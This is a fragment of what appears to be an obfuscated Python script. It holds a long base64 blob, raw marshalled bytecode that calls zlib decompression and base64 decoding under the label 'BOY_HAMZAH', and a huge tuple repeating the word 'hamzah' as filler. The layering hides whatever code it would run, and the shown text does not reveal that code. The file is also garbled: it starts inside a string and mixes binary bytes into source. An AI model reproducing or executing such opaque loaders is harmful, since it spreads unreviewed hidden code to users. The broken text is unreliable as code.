YF8V7budr4n0RRIlzcQEc35NgdIGIB0NwDS7R/IK7Kx83a3LyDd3kDEWpSPhtxAvi9beztflmgKpNsbiIhmIuQAiQCQngZAevwD+aBs/Lzd4wtIjzcQsTblQdAN5Iey9bfzjYmmQHq8gYhoDgYdIHCb87UJCUivfyC/LhtDb/f6AtLrDUSsVdkMuIEkZGNo52sTTYH0egMR0XQGHCCQdue7ExKQPv9Aflc2jqYbWwPp8wYiPgjBDSMdIHtl42jnuxNNgfR5AxHR1BtG4taDP02GkTQO5Irh9pVLVhQGzjrTsWVESVPWZET5S4w9siUlzWo3sqQki6cG5pTcpqm1OZO3tdQQzmZL9lVfZNYcemVs1Pods37Hrd8J63fS+p3KfQnv/D10vszEdpJT/Gea/8zwn1n+c6KpXSaUFGZ8y7KzemeL27d/6EDwJ2spic9985aSaC7SwlLS526tfz9Gkg0Kce4P0PlDdP4IndfR+QY630THXWRzf4zOt9D5E3T+PTrfblBGvw6HP0C7mX1vwhbSbaH41tg/PuQOsD6e6dvSkWwbo8Ez/8tt7Uh7sC8s4MbdCwtD07YItguhoAvUvKmZelHL3cAz2DJW8yW1XKTNRFfzxmpBX6Qdgs1V3CNYL62QlFLwimZiK0p3rVcL4solaOt0DY64eKOFk4lTDsX1gqlXeMmD54xUyuUC30EY296qdm9dM0xjRNtc0vh0RA7z2MSkXipWylXzQrVarlIRoq2AK3lzlW8PbCzrBY1knNKFb6CXTKrrF1VqJQy9SPdUtUqV2kX+qlqhnFdN1B4MzVS15TwkUSstlek9nWKKLXkOE5k7hA6VaZw042ZfhBYnfnJPonPaLogL6KzYhVO1yxtZNZP182t26f66yJGFhVK+qEGWMea12Ste+mSxrK4XtJ+hPZur4IQCvwEy0AMykQSpQynMwF+SbMvEXwYkUvx2Ba6jtCYjgWgE/qLRA9GuaHc0E01HlWhP9Fh0LNoXnYwOwN+P2I9YONoPfz9if26d+cVE4P8CyRmfDg=='(\x06\x00\x00\x00t\x07\x00\x00\x00marshalt\x04\x00\x00\x00zlibt\x06\x00\x00\x00base64t\x05\x00\x00\x00loadst\n\x00\x00\x00decompresst\t\x00\x00\x00b64decode(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\n\x00\x00\x00BOY_HAMZAHt\x08\x00\x00\x00<module>\x06\x00\x00\x00s\x02\x00\x00\x00$\x01")
hamzah=(
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
